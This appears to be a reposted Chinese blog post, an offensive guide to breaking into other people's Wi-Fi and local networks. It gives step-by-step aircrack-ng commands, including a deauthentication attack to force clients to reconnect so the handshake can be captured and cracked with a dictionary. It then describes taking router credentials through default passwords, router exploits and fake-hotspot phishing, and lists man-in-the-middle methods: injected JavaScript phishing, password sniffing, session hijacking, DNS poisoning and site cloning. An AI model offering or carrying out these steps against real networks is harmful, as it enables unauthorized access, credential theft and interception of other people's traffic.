本文轉自 _博客
一,密碼破解
wifi破解最主要的還是抓握手包破解(不要給我說某某鑰匙的“分享”)。
wifi認證主要分為四步:
1,無線客戶端與ap連接時,首先發送一個認證請求包
2,ap收到請求后發送一段信息給客戶端
3,客戶端將信息加密后交給ap
4,ap檢查加密結果是否正確,正確則連接,反之否。
破解步驟(以aircrack-ng為例子):
1,將無線網卡打開至監聽模式:
airmon-ng start wlan0
2,探測無線網絡:
airodump-ng mon0
3,選擇要破解的路由器
airodump-ng -c 信道號 –bssid ap的mac -w 保存的包名 mon0
4,發送deauth攻擊,使客戶端斷開ap,然后自動重連,方便抓取握手包
aireplay-ng -0 10 -a ap的mac -c 客戶端的mac –ignore-negative-one mon0
5,破解
aircrack-ng -w 字典 之前保存的包名
也可以使用fern-wifi-cracker這個python寫的圖形化傻瓜式一鍵破解工具。
二,局域網滲透
1,還是路由器
知道了wifi密碼還不夠,還需要得到撥號帳號密碼。
a)默認的帳號密碼
b)路由器漏洞 routerpwn
c)基礎認證釣魚 http://www.qq2b.net/archives/213.html
wifiphiser :偽造熱點,並且彈出一個路由器升級提示頁面,讓你輸入密碼
2,中間人攻擊
局域網不用像內網域滲透那樣小心翼翼
1)dsploit,cain,ettercap等工具
注入js釣魚,嗅探密碼,下載替換,會話劫持,dns毒化等等配合社工效果更佳。特別細化dns毒化+set工具包的站點克隆。